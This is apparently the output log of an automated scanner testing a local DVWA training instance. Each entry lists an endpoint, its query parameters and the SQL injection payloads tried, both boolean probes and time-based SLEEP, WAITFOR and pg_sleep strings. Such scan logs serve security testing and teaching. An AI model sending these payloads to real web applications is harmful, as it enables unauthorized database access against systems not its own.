Target: http://localhost/dvwa/ (GET)

---
URL:http://localhost/dvwa/vulnerabilities/brute/ (POST)
VulnName: 
Query: {'username': 'cntvalue', 'user_token': '7f6a3413046dfd3f01afd26e12539500', 'Login': 'Login', 'password': 'cntvalue'}
Payload: +and+51820=51820
+and+76455=76455
+or+86755=86755#
+and+76139=76140
Advice: 
---
---
URL:http://localhost/dvwa/instructions.php (GET)
VulnName: 
Query: {'doc': 'PDF'}
Payload: ' or SLEEP(3);-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/sqli/ (GET)
VulnName: 
Query: {'user_token': '75e3c6e80424e073d0b7678bc928592e', 'id': 'cntvalue', 'Submit': 'Submit'}
Payload: +and+51820=51820
+and+76455=76455
+or+86755=86755#
+and+76139=76140
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/csrf/ (GET)
VulnName: 
Query: {'password_new': 'cntvalue', 'password_current': 'cntvalue', 'password_conf': 'cntvalue', 'Change': 'Change', 'user_token': 'a03fdf95be89d0681d76435ccb71c2d3'}
Payload: +and+51820=51820
+and+76455=76455
+or+86755=86755#
+and+76139=76140
Advice: 
---
---
URL:http://localhost/dvwa/instructions.php (GET)
VulnName: 
Query: {'doc': 'copying'}
Payload: ;waitfor delay '0:0:3';-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/fi/ (GET)
VulnName: 
Query: {'page': 'file1.php'}
Payload: ' or pg_sleep(3) and '1'='1
Advice: 
---
---
URL:http://localhost/dvwa/instructions.php (GET)
VulnName: 
Query: {'doc': 'changelog'}
Payload: );waitfor delay '0:0:3';-- 
Advice: 
---